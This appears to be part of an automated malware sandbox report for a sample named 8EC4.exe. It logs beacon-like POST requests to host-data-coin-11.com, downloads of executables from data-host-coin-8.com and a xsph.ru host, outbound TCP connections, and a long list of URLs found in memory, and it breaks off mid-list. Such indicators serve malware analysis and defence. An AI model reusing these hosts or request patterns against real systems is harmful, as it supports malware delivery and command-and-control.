Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cbwqss.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 118 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://toosx.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 260 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dokqsat.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 120 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pipoxpya.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 357 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wbrirc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 286 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dwskrgjp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 188 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pwahu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 185 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xnfmckfat.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 239 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://htagjvn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /45512.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nadbxcytci.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 367 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wvnyptv.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 202 | Host: host-data-coin-11.com
Source: global traffic | TCP traffic: 192.168.2.4:49807 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.4:49908 -> 86.107.197.138:38133
Source: unknown | Network traffic detected: IP country count 10
                          Source: global trafficTCP traffic: 192.168.2.4:49829 -> 40.93.212.0:25
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                          Source: WerFault.exe, 00000012.00000003.793911909.00000000010E9000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.796410725.00000000010E9000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.828113364.00000188ABAEB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                          Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: 8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22
